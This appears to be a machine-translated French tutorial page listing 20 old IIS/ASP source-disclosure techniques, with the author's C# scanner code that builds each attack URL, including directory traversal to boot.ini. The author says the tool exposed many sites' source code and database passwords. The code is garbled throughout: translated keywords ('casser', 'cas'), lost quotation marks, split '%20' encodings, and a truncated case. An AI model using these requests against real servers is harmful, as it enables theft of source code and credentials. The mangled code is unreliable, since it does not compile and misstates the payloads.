Page d'accueil>Tutoriel de programmation réseau>Tutoriel ASP

20 méthodes et outils pour afficher le code source du programme ASP

Auteur:Eve Cole Date de mise à jour:2025-03-13 14:32:01

Comme nous le savons tous, la plate-forme Windows a de nombreuses lacunes, les correctifs sont les uns après les autres, mais il ne suffit toujours pas de compenser. J'ai résumé les 20 méthodes que je connais sur le code source ASP et j'ai écrit une application en C # pour scanner ces vulnérabilités. Mais au cours des deux derniers jours, j'ai vraiment vu le code source de nombreux sites Web, y compris les mots de passe de la base de données. à la base de données et faites ce que vous voulez. Tout d'abord, énumérez ces 20 méthodes ci-dessous:

.

% 81

::DONNÉES

% 2E

% 2e% 41sp

+ .htr

//

longhtr

.Bak

codebrws.asp

showcode.asp

null.htw

qfullhit.htw

qsumrhit.htw

query.idq

recherche / qfullhit.htw

recherche / qsumrhit.htw

iirturnh.htw

.htw

Traduire: F

Les 10 premières vulnérabilités ci-dessus sont directement ajoutées au fichier ASP, tel que% 81 est xxx.asp% 81. : F La méthode n'est pas disponible via le navigateur. Téléchargez tout depuis mon site.

Switch (this.cbomethod.selectedIndex)

{

cas 0: // Lire directement

strRequestFile = strServer + strurl;

casser;

cas 5: //% 2e% 41sp

strRequestFile = strServer + strpath + strfirst

+% 2e% 41sp;

casser;

Cas 8: // Longhtr

strRequestFile = strServer + strurl

+ +% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20%

+ 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20%

+ 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% .HTR;

casser;

cas 10: //codebrws.asp

strRequestFile = strServer + /iisSamples/exair/howitworks/codebrws.asp?source=

+ strurl;

casser;

cas 11: //showcode.asp

strRequestFile = strServer + /iisSamples/exair/howitworks/codebrws.asp?source=

+ /msadc/../../../boot.ini;

casser;

Cas 12: //null.htw

strRequestFile = strServer + /null.htw?ciwebhitsfile=

+ Strurl +% 20 & Cirestriction = Aucun & cihiliteType = Full;

casser;

Cas 13: //qfullhit.htw

strRequestFile = strServer + /iisSamples/issamples/oop/qfullhit.htw?

+ Ciwebhitsfile = / .. / .. / boot.ini & cirestriction = aucun

+ & CihiliteType = full;

casser;

Cas 14: //qsumrhit.htw

strRequestFile = strServer + /iiss

+ Ciwebhitsfile = / .. / .. / boot.ini & cirestriction = aucun

+ & CihiliteType = full;

casser;

cas 15: //query.idq

strRequestFile = strServer + /query.idq?citemplate=/../../boot.ini

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20%

+ 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% .htx;

casser;

Cas 16: //search/qfullhit.htw

strRequestFile = strServer + /iissamples/exair/search/qfullhit.htw?

+ Ciwebhitsfile = / .. / .. / boot.ini & cirestriction = aucun

+ & CihiliteType = full;

casser;

Cas 17: // Search / Qsumrhit.htw

strRequestFile = strServer + /iissamples/exair/search/qsumrhit.htw?

+ Ciwebhitsfile = / .. / .. / boot.ini & cirestriction = aucun

+ & CihiliteType = full;

casser;

Cas 18: //iirturnh.htw

strrequestfile = strServer + /iishelp/iis/misc/iirturnh.htw?

+ Ciwebhitsfile = / .. / .. / boot.ini & cirestriction = aucun

+ & CihiliteType = full;

casser;

Cas 19: //.htw

strRequestFile = strServer + strurl

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20%

+ 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20

+% 20% 20% 20% 20% 20% 20% 20% 20% 20% 20% .htw?

+ Ciwebhitsfile = / .. / .. / boot.ini & cirestriction = aucun

+ & CihiliteType = full;

casser;

défaut:

strRequestFile = strServer + strurl + this.cbomeThod.Text;

}

Articles connexes